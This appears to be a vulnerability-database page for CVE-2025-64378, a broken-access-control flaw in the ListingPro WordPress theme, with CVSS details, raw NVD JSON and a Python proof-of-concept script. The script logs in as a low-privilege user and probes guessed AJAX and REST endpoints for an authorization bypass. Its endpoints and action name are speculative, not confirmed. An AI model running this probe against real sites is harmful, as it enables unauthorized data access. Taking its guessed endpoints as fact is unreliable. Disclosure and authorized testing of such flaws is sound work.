Security Vulnerability Report
中文
CVE-2025-64378 CVSS 7.1 HIGH

CVE-2025-64378

Published: 2025-12-18 08:16:15
Last Modified: 2026-04-27 16:16:42

Description

Missing Authorization vulnerability in CridioStudio ListingPro listingpro allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects ListingPro: from n/a through < 2.9.10.

CVSS Details

CVSS Score
7.1
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:L/A:N

Configurations (Affected Products)

No configuration data available.

ListingPro < 2.9.10

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# CVE-2025-64378 PoC - ListingPro Authorization Bypass # Requires a low-privilege user account (subscriber role) import requests import sys target_url = input("Enter target URL: ").rstrip('/') username = input("Enter username: ") password = input("Enter password: ") session = requests.Session() # Step 1: Login with low-privilege account login_url = f"{target_url}/wp-login.php" login_data = { 'log': username, 'pwd': password, 'wp-submit': 'Log In', 'redirect_to': f"{target_url}/wp-admin/", 'testcookie': '1' } response = session.post(login_url, data=login_data, allow_redirects=True) print(f"[+] Login attempt: {'Success' if 'wp-admin' in response.url else 'Failed'}") # Step 2: Identify vulnerable endpoint (example - listing update/delete) # Common vulnerable patterns in ListingPro: # - /wp-admin/admin-ajax.php (various actions) # - /wp-json/listingpro/v2/ endpoints vulnerable_endpoints = [ f"{target_url}/wp-admin/admin-ajax.php", f"{target_url}/wp-json/listingpro/v2/listings" ] # Step 3: Test authorization bypass for endpoint in vulnerable_endpoints: test_payload = { 'action': 'listingpro_get_post_data', 'post_id': '1', 'security': '' } response = session.post(endpoint, data=test_payload) print(f"[>] Testing {endpoint}") print(f" Status: {response.status_code}") print(f" Response length: {len(response.text)}") if response.status_code == 200 and len(response.text) > 100: print(f"[!] Potential authorization bypass detected!") print(f" Response preview: {response.text[:200]}") print("\n[*] Manual verification recommended for confirmed exploitation.")

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-64378", "sourceIdentifier": "[email protected]", "published": "2025-12-18T08:16:14.897", "lastModified": "2026-04-27T16:16:42.240", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Missing Authorization vulnerability in CridioStudio ListingPro listingpro allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects ListingPro: from n/a through < 2.9.10."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:L/A:N", "baseScore": 7.1, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 4.2}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-862"}]}], "references": [{"url": "https://patchstack.com/database/Wordpress/Theme/listingpro/vulnerability/wordpress-listingpro-theme-2-9-10-broken-access-control-vulnerability?_s_id=cve", "source": "[email protected]"}]}}